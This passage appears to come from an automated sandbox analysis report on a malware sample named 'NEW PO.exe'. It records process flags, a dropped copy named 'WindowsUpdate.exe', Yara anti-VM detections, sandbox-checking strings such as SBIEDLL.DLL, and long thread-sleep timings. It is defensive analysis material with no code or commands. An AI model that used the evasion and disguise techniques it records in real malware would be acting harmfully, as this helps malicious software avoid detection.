Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 0.2.NEW PO.exe.33497d4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.WindowsUpdate.exe.2c2982c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.WindowsUpdate.exe.319982c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.373074864.0000000003171000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.296608068.0000000003321000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.356792870.0000000002C01000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: NEW PO.exe PID: 7156, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsUpdate.exe PID: 6976, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsUpdate.exe PID: 4816, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: NEW PO.exe, 00000000.00000002.296608068.0000000003321000.00000004.00000001.sdmp, WindowsUpdate.exe, 0000000F.00000002.356792870.0000000002C01000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000011.00000002.373074864.0000000003171000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: NEW PO.exe, 00000000.00000002.296608068.0000000003321000.00000004.00000001.sdmp, WindowsUpdate.exe, 0000000F.00000002.356792870.0000000002C01000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000011.00000002.373074864.0000000003171000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Users\user\Desktop\NEW PO.exe TID: 7160	Thread sleep time: -42920s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe TID: 2244	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe TID: 6012	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe TID: 6492	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe TID: 6484	Thread sleep time: -140000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe TID: 6504	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe TID: 2408	Thread sleep time: -14757395258967632s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe TID: 2408	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe TID: 2408	Thread sleep time: -99640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe TID: 2408	Thread sleep time: -99437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe TID: 2408	Thread sleep time: -99324s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe TID: 2408	Thread sleep time: -99140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe TID: 2408	Thread sleep time: -99000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe TID: 2408	Thread sleep time: -98867s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe TID: 2408	Thread sleep time: -98429s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe TID: 2408	Thread sleep time: -98325s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe TID: 2408	Thread sleep time: -98203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe TID: 2408	Thread sleep time: -98094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe TID: 2408	Thread sleep time: -97922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe TID: 2408	Thread sleep time: -97240s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe TID: 2408	Thread sleep time: -97115s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe TID: 2408	Thread sleep time: -96984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe TID: 2408	Thread sleep time: -96859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe TID: 2408	Thread sleep time: -96750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe TID: 2408	Thread sleep time: -96625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe TID: 2408	Thread sleep time: -96515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe TID: 2408	Thread sleep time: -96390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe TID: 2408	Thread sleep time: -96281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe TID: 2408	Thread sleep time: -96172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe TID: 2408	Thread sleep time: -95890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe TID: 5784	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 3348	Thread sleep time: -38078s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 3324	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 3952	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 1860	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 4140	Thread sleep time: -36592s >= -30000s
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 5244	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 6808	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 2808	Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 4564	Thread sleep time: -140000s >= -30000s
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 6448	Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 6464	Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 6464	Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 6464	Thread sleep time: -99703s >= -30000s
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 6464	Thread sleep time: -99093s >= -30000s
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 6464	Thread sleep time: -98928s >= -30000s
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 6464	Thread sleep time: -98426s >= -30000s
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 6464	Thread sleep time: -98297s >= -30000s
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 6464	Thread sleep time: -98156s >= -30000s
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 6464	Thread sleep time: -98046s >= -30000s
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 6464	Thread sleep time: -97921s >= -30000s
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 6464	Thread sleep time: -97812s >= -30000s
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 6464	Thread sleep time: -97703s >= -30000s
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 6464	Thread sleep time: -97593s >= -30000s
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 6464	Thread sleep time: -97484s >= -30000s
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 6464	Thread sleep time: -97375s >= -30000s
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe TID: 6464	Thread sleep time: -97265s >= -30000s
